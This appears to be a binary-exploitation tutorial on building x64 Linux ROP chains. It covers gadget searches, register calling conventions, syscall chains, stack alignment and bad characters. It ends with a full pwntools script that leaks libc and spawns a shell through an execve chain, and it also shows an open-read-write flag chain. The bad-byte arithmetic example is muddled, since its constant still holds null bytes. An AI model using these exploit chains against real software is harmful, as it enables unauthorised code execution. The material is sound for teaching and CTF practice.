x64 ROP Chains: Systematic Gadget Hunting

Building ROP chains on x64 Linux - finding gadgets with ropper, handling calling conventions, chaining syscalls, dealing with bad characters, stack alignment, and a complete worked example.

Why x64 ROP Is Different from x86 ROP

Three things change everything when moving from 32-bit to 64-bit ROP:

  1. Register-based calling convention: x86 cdecl pushed every argument on the stack, so a chain that called system("/bin/sh") was mechanically [ret_addr_of_system, junk_return, &"/bin/sh"]. On x64 the first six arguments live in registers, so the chain has to load registers first.
  2. Address space size: every gadget address is now 8 bytes, half of which are usually \x00. If your overflow uses strcpy/strcat/sprintf (anything null-terminated), addresses end-with-null are unusable mid-chain.
  3. Stack alignment: the System V ABI mandates 16-byte RSP alignment immediately before a call instruction. SSE-using libc functions (printf, system) crash on movaps if you violate this.

This post is a systematic walkthrough of how to build chains that survive all three.

x64 Calling Convention

On Linux x64, the first 6 arguments go in registers: rdi, rsi, rdx, rcx, r8, r9. A ROP chain must load these registers via pop; ret gadgets before calling the target function.

Argument Register Typical use
1 rdi first pointer/value
2 rsi second pointer/value
3 rdx third pointer/value (also read/write count)
4 rcx fourth pointer/value (note: syscalls clobber rcx - use r10 for syscall arg 4 instead)
5 r8 fifth pointer/value
6 r9 sixth pointer/value

Return value lands in rax. Floating-point arguments use xmm0..xmm7 (rare in exploit work). For variadic functions like printf, rax must contain the count of XMM registers used (typically 0 for plain ROP).

Why Registers Make Life Harder

For system("/bin/sh") you need exactly one register (rdi) loaded with a pointer to /bin/sh. For execve("/bin/sh", argv, envp) via syscall you need four registers, plus rax = 59, plus r10 = rcx_clone. Each register requires a pop reg; ret gadget - and the wider you go, the harder it is to find clean ones.

Finding Gadgets

ropper --file vuln --search "pop rdi"
ropper --file vuln --search "pop rsi; pop r15"
ropper --file vuln --search "ret"  # for stack alignment

ropper and ROPgadget are the two standards. Both walk the executable sections, scan backwards from every ret/jmp reg/call reg for any byte sequence that decodes as valid x64 instructions, and emit a list. Use either; pwntools’ ROP() class wraps both internally.

Useful Search Patterns

# Direct register loaders
ropper -f vuln --search 'pop rdi; ret'
ropper -f vuln --search 'pop rsi; ret'
ropper -f vuln --search 'pop rdx; ret'

# Two-register / multi-register variants when single ones don't exist
ropper -f vuln --search 'pop rsi; pop r15; ret'   # very common
ropper -f vuln --search 'pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret'

# Syscall / direct syscall
ropper -f vuln --search 'syscall'
ropper -f vuln --search 'syscall; ret'

# Memory-write primitives
ropper -f vuln --search 'mov qword ptr [rdi], rsi; ret'   # arbitrary 8-byte write
ropper -f vuln --search 'xchg rax, rsp'                   # stack pivot

# Alignment
ropper -f vuln --search 'ret'                              # any clean ret

# Static binaries - search libc bundled into the ELF
ROPgadget --binary vuln | grep ': pop rdx'

Where to Search When the Binary Is Sparse

Small statically-stripped binaries sometimes have no pop rdx; ret at all. Sources of additional gadgets:

Source When available
libc.so.6 (after libc leak) Dynamic binary, libc gadgets after stage-1 leak
ld-linux-x86-64.so.2 Always loaded; small but contains a few useful pop-r* / syscall gadgets
vsyscall page (0xffffffffff600000) Only on older kernels; contains a few fixed syscall entry points
Existing functions used “in the middle” A function epilogue (add rsp, X; pop r12; pop r13; pop rbp; ret) often serves as a multi-pop gadget
__libc_csu_init (pre-glibc-2.34) The Universal-Gadget - a 6-pop epilogue that lets you load r12-r15 + rbp + rbx in one shot

The “csu_init Universal Gadget”

In binaries linked against glibc < 2.34, __libc_csu_init ends with a stylised epilogue that ROP chains love:

__libc_csu_init+90:    pop rbx
__libc_csu_init+91:    pop rbp
__libc_csu_init+92:    pop r12
__libc_csu_init+94:    pop r13
__libc_csu_init+96:    pop r14
__libc_csu_init+98:    pop r15
__libc_csu_init+100:   ret

__libc_csu_init+74:    mov rdx, r15
__libc_csu_init+77:    mov rsi, r14
__libc_csu_init+80:    mov edi, r13d
__libc_csu_init+83:    call qword ptr [r12 + rbx*8]

A two-stage chain: first hit +90 to load all six registers; then jump to +74 to move them into rdx, rsi, edi and call [r12+rbx*8]. This solves the “no pop rdx; ret exists” problem on most pre-2.34 binaries.

In glibc 2.34+, __libc_csu_init has been removed (the init code is part of _start instead) - search elsewhere.

Common x64 ROP Pattern

rop = b""
rop += p64(pop_rdi)        # pop rdi; ret
rop += p64(bin_sh_addr)     # "/bin/sh" string address
rop += p64(ret)             # stack alignment (16-byte)
rop += p64(system_addr)     # system()

This is the canonical “you have a libc leak” payload. The ret between the argument loader and the call to system exists for one purpose only - adding 8 bytes to RSP so that by the time system’s prologue executes its movaps, RSP is 16-aligned.

When You Need More Than Three Lines

A real chain is rarely this clean. Practical considerations:

rop  = p64(pop_rdi) + p64(elf.got['puts'])    # arg1 = puts@got
rop += p64(plt_puts)                          # call puts(puts@got) → leak libc
rop += p64(elf.symbols['main'])               # return to main, restart with libc base known

# After receiving the leak, build chain 2 with libc.address resolved
rop2  = p64(pop_rdi) + p64(libc_binsh)
rop2 += p64(ret_align)
rop2 += p64(libc.symbols['system'])

Syscall ROP Chain

For a direct execve syscall:

rop  = p64(pop_rax) + p64(59)              # syscall number for execve
rop += p64(pop_rdi) + p64(bin_sh)           # filename = "/bin/sh"
rop += p64(pop_rsi) + p64(0)               # argv = NULL
rop += p64(pop_rdx) + p64(0)               # envp = NULL
rop += p64(syscall_ret)                     # syscall; ret

Linux x64 Syscall ABI (vs. function call)

This catches people every time. Function calls use rcx for arg 4. Syscalls use r10 for arg 4 because syscall itself clobbers rcx (the kernel writes rip+2 into rcx for sysret). The common syscalls and their numbers:

# Name Args
0 read rdi=fd, rsi=buf, rdx=count
1 write rdi=fd, rsi=buf, rdx=count
2 open rdi=pathname, rsi=flags, rdx=mode
10 mprotect rdi=addr, rsi=len, rdx=prot
59 execve rdi=pathname, rsi=argv, rdx=envp

When system Is Off-Limits

Sandboxed CTF binaries frequently seccomp away execve (and fork, clone, etc.), forcing an “open-read-write” chain (ORW):

rop  = p64(pop_rdi) + p64(flag_path)
rop += p64(pop_rsi) + p64(0)                 # O_RDONLY
rop += p64(pop_rax) + p64(2)                 # SYS_open
rop += p64(syscall_ret)                      # rax = fd

rop += p64(pop_rdi) + p64(3)                 # fd (assume 3)
rop += p64(pop_rsi) + p64(buf)
rop += p64(pop_rdx) + p64(0x100)
rop += p64(pop_rax) + p64(0)                 # SYS_read
rop += p64(syscall_ret)

rop += p64(pop_rdi) + p64(1)                 # stdout
rop += p64(pop_rsi) + p64(buf)
rop += p64(pop_rdx) + p64(0x100)
rop += p64(pop_rax) + p64(1)                 # SYS_write
rop += p64(syscall_ret)

Stack Alignment

System V ABI requires 16-byte stack alignment before call. If your chain crashes in system() or printf(), insert an extra ret gadget.

Diagnosing the Crash

The fingerprint of a stack-alignment crash is unmistakable:

gdb-peda$ x/i $rip
=> 0x7f9...:    movaps XMMWORD PTR [rsp+0x50], xmm0
gdb-peda$ p/x $rsp & 0xf
$1 = 0x8       ← off by 8, classic alignment bug

movaps and movdqa require 16-byte aligned operands; an unaligned access raises SIGSEGV. The fix is to ensure RSP & 0xf == 0 immediately before the call, which means immediately after the previous ret, RSP must be 0x...8 (the ret itself pops 8 bytes).

The 8-Byte Rule

After every ret in your chain, RSP advances by 8. If your initial overflow leaves RSP at a known offset, count ret instructions:

  • Even number of pops between calls → alignment preserved.
  • Odd number → off by 8, insert a single ret gadget to fix.

In practice, a single bare ret between the last argument-loader and the function call solves 99% of crashes.

Dealing with Bad Characters

If certain bytes (like \x00 or \x0a) are filtered, find alternate gadgets or use add/sub gadget chains to construct addresses without bad bytes.

Common Bad Character Sets

Source of overflow Likely banned bytes
gets, fgets \x0a (newline)
read from network usually none, full 8-bit clean
strcpy, strcat \x00
scanf("%s", ...) whitespace: \x09 \x0a \x0b \x0c \x0d \x20
recv followed by strncpy \x00

Any address ending in \x00 (very common, since the upper bytes of x64 user addresses are \x00\x00) is unusable mid-chain when null-bytes are forbidden - except as the last 8 bytes of the payload.

Building Bad-Byte-Free Addresses

If you need address 0x401234 but \x00 is banned, two tactics:

  1. Compute via arithmetic gadgets:

    rop  = p64(pop_rax) + p64(0x10000000401234)   # contains 0x00 in the middle? no
    rop += p64(sub_rax_const)
    rop += p64(0x10000000000000)                  # subtract to get target
    rop += p64(jmp_rax)
    
  2. sprintf("%s", payload)-style: send the payload past the bad characters and use a gadget to copy it into a clean writable region (.bss, heap), then pivot the stack into the new region (xchg rsp, rax).

Bad Bytes Inside Libc Addresses

After ASLR, libc base typically has the form 0x7f???????????? - the leading 0x7f is rarely a problem, but \x00 mid-chain stays a problem. Same arithmetic-gadget tricks apply, with the leak from stage 1 already in rax.

Worked Example: Tying It All Together

from pwn import *

elf  = ELF('./vuln')
libc = ELF('./libc.so.6')
io   = process('./vuln')

# ---- Gadgets in the binary ----
pop_rdi  = next(elf.search(asm('pop rdi; ret'),  executable=True))
ret_g    = next(elf.search(asm('ret'),           executable=True))

# ---- Stage 1: leak libc through puts ----
chain1  = b'A' * 0x40 + b'B' * 8                         # buffer + saved RBP
chain1 += p64(pop_rdi) + p64(elf.got['puts'])
chain1 += p64(elf.plt['puts'])
chain1 += p64(elf.symbols['main'])

io.sendlineafter(b'> ', chain1)
leak = u64(io.recv(6).ljust(8, b'\x00'))
libc.address = leak - libc.symbols['puts']
log.success(f'libc base = {hex(libc.address)}')

# ---- Stage 2: execve("/bin/sh", 0, 0) via direct syscall ----
pop_rax     = libc.address + 0x000000000003a738    # pop rax; ret
pop_rsi     = libc.address + 0x000000000002601f    # pop rsi; ret
pop_rdx     = libc.address + 0x0000000000142c92    # pop rdx; ret
syscall_ret = libc.address + 0x0000000000091316    # syscall; ret
binsh       = next(libc.search(b'/bin/sh\x00'))

chain2  = b'A' * 0x40 + b'B' * 8
chain2 += p64(pop_rax) + p64(0x3b)                 # SYS_execve
chain2 += p64(pop_rdi) + p64(binsh)
chain2 += p64(pop_rsi) + p64(0)
chain2 += p64(pop_rdx) + p64(0)
chain2 += p64(ret_g)                                # alignment
chain2 += p64(syscall_ret)

io.sendlineafter(b'> ', chain2)
io.interactive()

A Few More Tactics Worth Knowing

  • SROP (Sigreturn-Oriented Programming): forge a sigcontext on the stack, return to a sigreturn syscall. One gadget loads all registers at once. Useful when conventional pop reg; ret gadgets are scarce.
  • JOP/COP: when ret instructions are restricted (rare on Linux, common in some embedded/Windows-CFG-protected binaries), use jmp [reg] or call [reg] chains instead.
  • mprotect + shellcode: allocate execution permission on a writable region, copy shellcode, jump to it. Lets you escape ROP entirely once you have the primitive.
  • Stack pivot: xchg rsp, rax, mov rsp, rbp; pop rbp; ret, leave; ret - pivot RSP into a controlled region (e.g. .bss, the heap, or anywhere your input was copied).
  • CET / Shadow Stack mitigations: Intel CET enforces a parallel shadow stack - every ret checks the saved return address against the shadow copy. Pure ROP fails. SROP, JOP, COP all break CET; future-proof chains favour these.

Master the x64 calling convention and you can build a ROP chain for any binary. The rest is just finding the right gadgets - and the discipline to keep RSP aligned.

← Home More Binary exploitation →